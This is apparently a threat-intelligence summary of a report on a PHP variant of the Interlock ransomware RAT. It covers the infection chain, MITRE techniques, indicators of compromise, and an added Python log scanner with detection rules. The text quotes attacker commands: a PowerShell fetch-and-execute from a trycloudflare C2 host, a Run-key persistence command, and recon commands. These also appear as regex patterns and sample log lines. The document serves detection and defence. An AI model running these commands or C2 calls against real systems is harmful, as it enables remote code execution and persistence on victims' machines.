Researchers have identified a new variant of the Interlock ransomware group’s remote access trojan (RAT) that uses PHP instead of JavaScript, expanding its delivery methods in widespread cyber campaigns. This PHP-based Interlock RAT leverages compromised websites with injected scripts and a resilient command and control infrastructure using trycloudflare.com URLs and fallback IPs. #InterlockRAT #KongTuke #FileFix
Key points
- The Interlock ransomware group has developed a new PHP-based RAT variant, differing from the previously known JavaScript (Node.js) version.
- Since May 2025, the RAT has been observed in campaigns linked to LandUpdate808 (KongTuke) web-inject threat clusters involving compromised websites.
- The infection chain begins with a captcha and clipboard paste execution method that leads to running a PowerShell script launching the Interlock RAT.
- This PHP RAT variant performs automated discovery of system details using PowerShell commands, gathering extensive system, network, and privilege information.
- Command and control communication uses Cloudflare Tunnel service (trycloudflare.com) URLs with hardcoded fallback IPs for resilient connectivity.
- The RAT supports commands for executing EXE and DLL files, persistence via registry Run key modification, shell command execution, and self-termination.
- Lateral movement is performed through RDP, and the campaign appears opportunistic, targeting multiple industries.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – The RAT uses PowerShell scripts executed via cmd.exe to automate system reconnaissance and command execution. (“powershell -c Get-NetNeighbor…”, “powershell -c systeminfo”)
- [T1071.001] Application Layer Protocol: Web Protocols – The RAT communicates with C2 servers using HTTP over trycloudflare.com URLs to disguise traffic. (“…DownloadString(“http://deadly-programming-attorneys-our.trycloudflare.com”)”)
- [T1543.003] Create or Modify System Process: Windows Service – Persistence is established via registry Run key creation. (“reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v “REDACTED” …”)
- [T1021.001] Remote Services: Remote Desktop Protocol – Used for lateral movement across victim environments.
- [T1105] Ingress Tool Transfer – The RAT downloads executables (.exe) and DLLs for execution on the victim system.
Indicators of Compromise
- [File Hash] Config files associated with the RAT – 28a9982cf2b4fc53a1545b6ed0d0c1788ca9369a847750f5652ffa0ca7f7b7d3, 8afd6c0636c5d70ac0622396268786190a428635e9cf28ab23add939377727b0
- [Domain] Command and control infrastructure – existed-bunch-balance-councils.trycloudflare.com, ferrari-rolling-facilities-lounge.trycloudflare.com, and 4 more similar domains
- [IP Address] Fallback C2 IPs – 64.95.12.71, 184.95.51.165
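The techniques and indicators above map directly onto log-based detections: trycloudflare.com hostnames and the two fallback IPs in proxy or firewall logs, and PowerShell DownloadString, Run-key `reg add`, and the systeminfo / Get-NetNeighbor reconnaissance commands in process-creation logs. The following scanner is an added example written for this summary, not code from the report or from The DFIR Report; it embeds the domains and IPs listed above, generalizes the domain rule to flag any trycloudflare.com tunnel host (not only the six named in the report), and runs over constructed log lines in a simplified format (the log lines, the `quiet-hills-unseen-tunnel` subdomain, the `Updater` value name and the `update.exe` path are all made up for the example).

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Indicators copied from the report's IoC list.
KNOWN_C2_DOMAINS = {
    "existed-bunch-balance-councils.trycloudflare.com",
    "ferrari-rolling-facilities-lounge.trycloudflare.com",
    "deadly-programming-attorneys-our.trycloudflare.com",
}
FALLBACK_C2_IPS = {"64.95.12.71", "184.95.51.165"}

# Behavioural patterns derived from the command examples in the report.
# Any *.trycloudflare.com host is flagged (generalization beyond the listed IoCs).
RE_TUNNEL_HOST = re.compile(r"\b[a-z0-9-]+\.trycloudflare\.com\b", re.I)
RE_IPV4 = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
RE_DOWNLOADSTRING = re.compile(r"DownloadString\s*\(", re.I)
# Run-key persistence; HKLM is included as a defensive generalization of the HKCU command seen.
RE_RUN_KEY = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?(?:HKCU|HKLM|HKEY_CURRENT_USER|HKEY_LOCAL_MACHINE)'
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b",
    re.I,
)
RE_RECON = re.compile(r"powershell(?:\.exe)?\s+-c\s+(?:systeminfo|Get-NetNeighbor)\b", re.I)


@dataclass
class Hit:
    line_no: int   # 1-based index of the log line
    rule: str      # which detection fired
    evidence: str  # the matched fragment, for triage


def scan_line(line_no: int, line: str) -> List[Hit]:
    """Apply every rule to one log line and return all matches."""
    hits: List[Hit] = []
    for m in RE_TUNNEL_HOST.finditer(line):
        host = m.group(0).lower()
        rule = "known_c2_domain" if host in KNOWN_C2_DOMAINS else "trycloudflare_tunnel_host"
        hits.append(Hit(line_no, rule, host))
    for m in RE_IPV4.finditer(line):
        if m.group(0) in FALLBACK_C2_IPS:
            hits.append(Hit(line_no, "fallback_c2_ip", m.group(0)))
    if RE_DOWNLOADSTRING.search(line):
        hits.append(Hit(line_no, "powershell_downloadstring", "DownloadString("))
    m = RE_RUN_KEY.search(line)
    if m:
        hits.append(Hit(line_no, "run_key_persistence", m.group(0)))
    m = RE_RECON.search(line)
    if m:
        hits.append(Hit(line_no, "powershell_recon", m.group(0)))
    return hits


def scan_logs(lines: List[str]) -> List[Hit]:
    """Scan a batch of log lines; line numbers start at 1."""
    hits: List[Hit] = []
    for i, line in enumerate(lines, start=1):
        hits.extend(scan_line(i, line))
    return hits


def summarize(hits: List[Hit]) -> Dict[str, int]:
    """Count hits per rule, handy for a quick triage view."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h.rule] = counts.get(h.rule, 0) + 1
    return counts


# Constructed sample log lines (simplified proxy / firewall / process-creation format).
SAMPLE_LOGS = [
    "2025-07-10T12:00:01Z proxy client=10.0.0.5 dst=existed-bunch-balance-councils.trycloudflare.com:443 method=GET",
    "2025-07-10T12:00:02Z proc host=WS01 cmd=powershell -c IEX((New-Object Net.WebClient).DownloadString('http://deadly-programming-attorneys-our.trycloudflare.com'))",
    "2025-07-10T12:00:03Z proc host=WS01 cmd=reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d C:\\Users\\Public\\update.exe",
    "2025-07-10T12:00:04Z proc host=WS01 cmd=powershell -c systeminfo",
    "2025-07-10T12:05:00Z fw src=10.0.0.5 dst=184.95.51.165 dport=80 action=allow",
    "2025-07-10T12:06:00Z proxy client=10.0.0.7 dst=www.example.com:443 method=GET",
    # Made-up subdomain, not an IoC from the report: exercises the generic tunnel-host rule.
    "2025-07-10T12:07:00Z proxy client=10.0.0.7 dst=quiet-hills-unseen-tunnel.trycloudflare.com:443 method=GET",
]

if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(f"line {hit.line_no}: {hit.rule} -> {hit.evidence}")
    print(summarize(scan_logs(SAMPLE_LOGS)))
```

The generic `trycloudflare_tunnel_host` rule will also fire on legitimate Cloudflare Tunnel quick-tunnel usage, so treat it as a hunting signal to be reviewed rather than an alert on its own; the `known_c2_domain` and `fallback_c2_ip` rules, which match the report's IoCs exactly, carry far higher confidence.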
Read more: https://thedfirreport.com/2025/07/14/kongtuke-filefix-leads-to-new-interlock-rat-variant/